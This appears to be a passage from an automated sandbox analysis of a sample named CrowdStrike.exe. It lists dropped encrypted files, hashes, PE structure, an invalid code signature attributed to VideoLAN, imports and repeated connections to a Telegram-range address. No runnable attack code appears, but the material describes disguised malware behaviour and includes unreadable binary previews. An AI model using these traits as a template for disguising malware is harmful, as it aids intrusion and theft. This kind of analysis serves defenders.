                                                                      SHA-512:02C8C5BBD59101BDAE81BD05239822794DF95BFEB3FFA1E5980A4A57385F2F8FAD102AE850ECBE5FA3C6835C352C39717E3A6A9CBF69F7D3A80DE1A470CAA4CC
                                                                      Malicious:false
                                                                      Preview:h.y./z.............z..~..~...........W...7..~...9i=E..6...7>.7..w.aD.:...N.5.m>..nz(.!.h...+D.(."(.E.M..1M.........CP.%P).B.oDV.O.;..^.s......f...:1.q......~Oz...}....k.Rk.s|"..%/.Xr..G;.........rp.....Z..=.....!.v....J........:..r......u3./.....:.1..].W...<.".I....]...x..n<9$.3....g+...PBwz.,i...~3.F...p..#.....+)F...-.....lF^#.O..4...........P:.S.93.>X.|..[/.....z..f.p.....O.BL..B...q...Zw{..H.&..7.3...pF..m.I..;.`.`Dd......-i./._.b.....b.]...7.W..'....;...dy..D.;.."......[)...]...`T*2.h..ug7..8..Rp......1...Q.(.WXiK..cL=v.../X..$./..v.@/!...........e...~.?T....F..f.d.w.n..m.@.......x.....*.CD[.4Afp+kz.......v.5.!%.8..[u.E..u....4....Y........e..._.Y..7........qzT..=.t..X...)1\1/u#d....}.bmyF.1.n$#..9.7.#QTj.....Ql.._.4.v.O.<i...72...%Qn%..I@..d...=...9j6.).[........a..@......s.3?.%6..;..x...=)o.Ge.....$bC...M..Hh..t.<..Z."uh....Ja....|Wd..p/.....g:(.k.A. sN.ob.H..g.1...5 .c..S._r-.3.y(..1 ...~.t.os........S..G...l..LR]Y#a1E

                                                                      C:\Users\user\AppData\Local\Temp\Vision

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):120832
                                                                      Entropy (8bit):7.998337056809863
                                                                      Encrypted:true
                                                                      SSDEEP:3072:u9z/1m9ybZ6UKMRUAFOMpS3pHdr+tz+65S8nK:KdkybZ67MLFTpS3Vd58TK
                                                                      MD5:61217C1ABB4088C897CD62C8FD44D87F
                                                                      SHA1:0D131CBAB21D93699B0EF307207DB7412E82B28B
                                                                      SHA-256:3621FCCF1387FC43FF51F6C6E475CC6AAE507982F52A989508667557F3B40CB0
                                                                      SHA-512:21C721C2FE805AF1847B3B1CF8D1D7046C4DFA1CE45D79583A6008FD37A483D7919E938464A5D54BAA5903561B7371D8F4E2251A18EBA1824D4832ACF132356F
                                                                      Malicious:false
                                                                      Preview:...j.. ..B..b.>.E#...a..o...".....V..!..h2.....Y.Lv.`.....P...9%...+A3..t@]c..U..3........|q....3.RG..:(.....}).-y.`...wA....(...+....l..& 48RZ...b..g......{..'....n..2......P.(.....(.+6.W....."..... $.C$....s)...r....aV.gZ.'JY,..|....:...Em.2..j..n\.O.o..lV......(...aKX..c}8...3.6..L.P@G.x......{)/1~b..f.$[...@.$EJW.Oy..YB....6$..SE.N.,#..s.e.q.H./NA..P...k...r...7..1:.Z.~e.p.L@.....J#o7)v....#.......h.LK.6.Ta.N..h..>...r..H.^~.q...;u.RO"..p.........::...|..C.r.........F..._.^^.5...l..W..O.\S(,..fAt.S"..OD..8...9....)Co.;a-nT.......J.J..[....z.YT.. ..91...#0.q.......?E......GX2$^Z&T.".tH.D.Y..\.........Hs..2w..B.6.@..\....1[..3.u.lw.S,.......1....Z bv...w..*:..m. ..B.GJ.m.z.....hVx..>.x#.Cj.^...M.......9R....%.....ox..kBr.m.I.........V.3.s......u...>L.'...O....i.HJ......t.........&......r...'s.W..,......qd+.......Y.3...9.)v.3..m....u.yH.q.o&..[%!..a.z......+.9..1.p....a.M._.}.|.l..k.Zw#j..c.............J&.mm.c.I.......\.|..

                                                                      C:\Users\user\AppData\Local\Temp\Wave

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):6.46872448520698
                                                                      Encrypted:false
                                                                      SSDEEP:768:R+S6kiT3T/QqoWBY5WK9ivg0XWYETGVrPhISqAbwGpKZrLlm/:RDYL7Q+mr9R2VgjGpSO
                                                                      MD5:E27F5F4215920D7C0DB01D3A07E32FAD
                                                                      SHA1:875040E5D6FBFBCD2F4CA0F472CEF26BBF86870A
                                                                      SHA-256:C5A836D0021A235D4FC30764DFD4A2ABB33B23CA25F4DCA4A9BA7A8423F7753E
                                                                      SHA-512:1C621A173827C9F04258AEDB3562AAFD8FA4469E87FDE03391E5CD520499FC288961AAF1EA5F97CE131C3930DA9A16C420579E676AE4173B493C44BF6FBF64CF
                                                                      Malicious:false
                                                                      Preview:....F.^[]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j..o...]...U...u..u.j..[...]...U...u..u.j..G...]...U...u..u.j..3...]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j......]...U...u..u.j..k...]...U...u..u.j..W...]...U...u..u.j..C...]...U...u..u.j../...]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j..{...]...U..E..M.VQ.@....PQ..P.!....u....t...N...E..F..........N...&..F.....3.^]...U..E.VW.@.....Q..P....u......N...>3._.F.....^]...U....QSV.u.W....^...t..F.....P.......v..N..I..P.....u.P..j..D$.PW.p....|$.........t..M.V..O..V....Y...u.....N...F......>_^3.[..]...U.. ......SV.u.3.W3.M..E..~....v..F..H..-P....E....v..F..H...P.............R.U.f.......N.R.U.R.1.U.I.R.U.RSP..O..P....O..P.....u*.u...._M...U.3..&.G.~.j...W

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):2.272208790499672
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:CrowdStrike.exe
                                                                      File size:6'338'272 bytes
                                                                      MD5:755c0350038daefb29b888b6f8739e81
                                                                      SHA1:5b2f56953b3c925693386cae5974251479f03928
                                                                      SHA256:4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3
                                                                      SHA512:fede87ea708105ea3b44680f92b97881a32235614c741e7059d8ffe356b34cbcd0c57b11464cf33f4c15af46824c0c8e8e0ef5808b5251f3acbd3d783ee60add
                                                                      SSDEEP:24576:RHA1jDC3rgrKPucdYUxVXshqWzHt0IBLzvavUXUjLzC:6NSwKPucuUxVX+zmvU4C
                                                                      TLSH:3D5623228A609C32FF225DB066F496B96EB7BD125C61CCDB0308F24527B53439D35BA7
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                      File Icon

                                                                      Icon Hash:0099878e8ea0ba00

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x403883
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                      Authenticode Signature

                                                                      Signature Valid:false
                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                      Error Number:-2146869232
                                                                      Not Before, Not After
                                                                      • 07/06/2024 01:00:00 09/06/2027 00:59:59
                                                                      Subject Chain
                                                                      • CN=VideoLAN, O=VideoLAN, L=Paris, C=FR
                                                                      Version:3
                                                                      Thumbprint MD5:E995C628AAD797E68CAE9D6374BC8ACE
                                                                      Thumbprint SHA-1:CCF8C4F9272D8A25477AF13EC71F97A3027C7319
                                                                      Thumbprint SHA-256:13D255CB1919425FC94170917F458E0CEC043372B844B95AA70C9E6B488E1909
                                                                      Serial:09D08EBDA06BE07C815EA7AF25EF6875

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 000002D4h
                                                                      push ebx
                                                                      push ebp
                                                                      push esi
                                                                      push edi
                                                                      push 00000020h
                                                                      xor ebp, ebp
                                                                      pop esi
                                                                      mov dword ptr [esp+18h], ebp
                                                                      mov dword ptr [esp+10h], 00409268h
                                                                      mov dword ptr [esp+14h], ebp
                                                                      call dword ptr [00408030h]
                                                                      push 00008001h
                                                                      call dword ptr [004080B4h]
                                                                      push ebp
                                                                      call dword ptr [004082C0h]
                                                                      push 00000008h
                                                                      mov dword ptr [00472EB8h], eax
                                                                      call 00007FD9E07F14DBh
                                                                      push ebp
                                                                      push 000002B4h
                                                                      mov dword ptr [00472DD0h], eax
                                                                      lea eax, dword ptr [esp+38h]
                                                                      push eax
                                                                      push ebp
                                                                      push 00409264h
                                                                      call dword ptr [00408184h]
                                                                      push 0040924Ch
                                                                      push 0046ADC0h
                                                                      call 00007FD9E07F11BDh
                                                                      call dword ptr [004080B0h]
                                                                      push eax
                                                                      mov edi, 004C30A0h
                                                                      push edi
                                                                      call 00007FD9E07F11ABh
                                                                      push ebp
                                                                      call dword ptr [00408134h]
                                                                      cmp word ptr [004C30A0h], 0022h
                                                                      mov dword ptr [00472DD8h], eax
                                                                      mov eax, edi
                                                                      jne 00007FD9E07EEAAAh
                                                                      push 00000022h
                                                                      pop esi
                                                                      mov eax, 004C30A2h
                                                                      push esi
                                                                      push eax
                                                                      call 00007FD9E07F0E81h
                                                                      push eax
                                                                      call dword ptr [00408260h]
                                                                      mov esi, eax
                                                                      mov dword ptr [esp+1Ch], esi
                                                                      jmp 00007FD9E07EEB33h
                                                                      push 00000020h
                                                                      pop ebx
                                                                      cmp ax, bx
                                                                      jne 00007FD9E07EEAAAh
                                                                      add esi, 02h
                                                                      cmp word ptr [esi], bx

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ C ] VS2010 SP1 build 40219
                                                                      • [RES] VS2010 SP1 build 40219
                                                                      • [LNK] VS2010 SP1 build 40219

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x205e.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x605b700x5b70
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0xf40000x205e0x22007515af38073c4e3fcf00fa4c34ecf2f7False0.3141084558823529data4.231242615481245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xf70000xf320x1000b228dcf84aaf3f38125bddf00172da8eFalse0.5166015625data5.117664940540532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xf42080x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.2436247723132969
                                                                      RT_ICON0xf53300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.374113475177305
                                                                      RT_DIALOG0xf57980x100dataEnglishUnited States0.5234375
                                                                      RT_DIALOG0xf58980x11cdataEnglishUnited States0.6056338028169014
                                                                      RT_DIALOG0xf59b40x60dataEnglishUnited States0.7291666666666666
                                                                      RT_GROUP_ICON0xf5a140x22dataEnglishUnited States0.9705882352941176
                                                                      RT_VERSION0xf5a380x350data0.41509433962264153
                                                                      RT_MANIFEST0xf5d880x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                      Imports

                                                                      DLLImport
                                                                      KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jul 21, 2024 11:14:51.254693031 CEST4973780192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:14:51.259800911 CEST8049737104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:14:51.259876966 CEST4973780192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:14:51.260724068 CEST4973780192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:14:51.265866041 CEST8049737104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:14:51.719336987 CEST8049737104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:14:51.768831015 CEST4973780192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:15:33.947040081 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:33.947125912 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:33.948020935 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:33.958084106 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:33.958122015 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:34.625405073 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:34.625560999 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:34.627880096 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:34.627904892 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:34.628315926 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:34.675213099 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:34.695717096 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:34.740504980 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:35.016836882 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:35.016995907 CEST44349739149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:35.017059088 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:35.020888090 CEST49739443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:56.421400070 CEST4973780192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:15:56.422507048 CEST4974080192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:15:56.427515030 CEST8049740104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:15:56.427592993 CEST4974080192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:15:56.427649021 CEST8049737104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:15:56.427700996 CEST4974080192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:15:56.427700996 CEST4973780192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:15:56.432585001 CEST8049740104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:15:56.898094893 CEST8049740104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:15:56.899138927 CEST49741443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:56.899235964 CEST44349741149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:56.899368048 CEST49741443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:56.899625063 CEST49741443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:56.899674892 CEST44349741149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:56.941035032 CEST4974080192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:15:57.513375998 CEST44349741149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:57.515151024 CEST49741443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:57.515223026 CEST44349741149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:57.953274965 CEST44349741149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:57.953463078 CEST44349741149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:15:57.953788996 CEST49741443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:15:57.953881025 CEST49741443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:17.202126026 CEST4974280192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:17.207180977 CEST8049742104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:17.210273981 CEST4974280192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:17.210377932 CEST4974280192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:17.215220928 CEST8049742104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:17.679821014 CEST8049742104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:17.681040049 CEST49743443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:17.681067944 CEST44349743149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:17.681133986 CEST49743443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:17.681417942 CEST49743443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:17.681433916 CEST44349743149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:17.722434998 CEST4974280192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:18.858052015 CEST44349743149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:18.878591061 CEST49743443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:18.878613949 CEST44349743149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:19.244976997 CEST44349743149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:19.245157003 CEST44349743149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:19.245388031 CEST49743443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:19.245800018 CEST49743443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:21.237957001 CEST4974080192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:38.666795015 CEST4974280192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:38.667499065 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:38.672528028 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:38.672566891 CEST8049742104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:38.672660112 CEST4974280192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:38.672765017 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:38.672765017 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:38.677691936 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:39.141788006 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:39.142867088 CEST49745443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:39.142966032 CEST44349745149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:39.143052101 CEST49745443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:39.143322945 CEST49745443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:39.143357038 CEST44349745149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:39.190937996 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:39.769874096 CEST44349745149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:39.775724888 CEST49745443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:39.775806904 CEST44349745149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:40.171057940 CEST44349745149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:40.171237946 CEST44349745149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:16:40.171681881 CEST49745443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:40.171777964 CEST49745443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:16:58.205532074 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:58.206307888 CEST4974680192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:58.211647034 CEST8049746104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:58.211781979 CEST4974680192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:58.211983919 CEST4974680192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:58.213440895 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:58.213504076 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:58.519098043 CEST4974680192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:59.128463984 CEST4974680192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:59.276082993 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.276159048 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:59.276432991 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.276488066 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:59.276834965 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.276880026 CEST4974480192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:59.277034998 CEST8049746104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.277092934 CEST4974680192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:16:59.279232025 CEST8049746104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.279261112 CEST8049746104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.279426098 CEST8049746104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.281255960 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.281754971 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:16:59.285876989 CEST8049744104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:17:00.047106028 CEST8049746104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:17:00.050570965 CEST49747443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:00.050604105 CEST44349747149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:00.054491997 CEST49747443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:00.054600000 CEST49747443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:00.054609060 CEST44349747149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:00.097254038 CEST4974680192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:17:00.684530973 CEST44349747149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:00.686361074 CEST49747443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:00.686382055 CEST44349747149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:01.442675114 CEST44349747149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:01.442867994 CEST44349747149.154.167.220192.168.2.4
                                                                      Jul 21, 2024 11:17:01.442930937 CEST49747443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:01.443202019 CEST49747443192.168.2.4149.154.167.220
                                                                      Jul 21, 2024 11:17:22.258982897 CEST4974880192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:17:22.263922930 CEST8049748104.16.185.241192.168.2.4
                                                                      Jul 21, 2024 11:17:22.266453981 CEST4974880192.168.2.4104.16.185.241
                                                                      Jul 21, 2024 11:17:22.266679049 CEST4974880192.168.2.4104.16.185.241
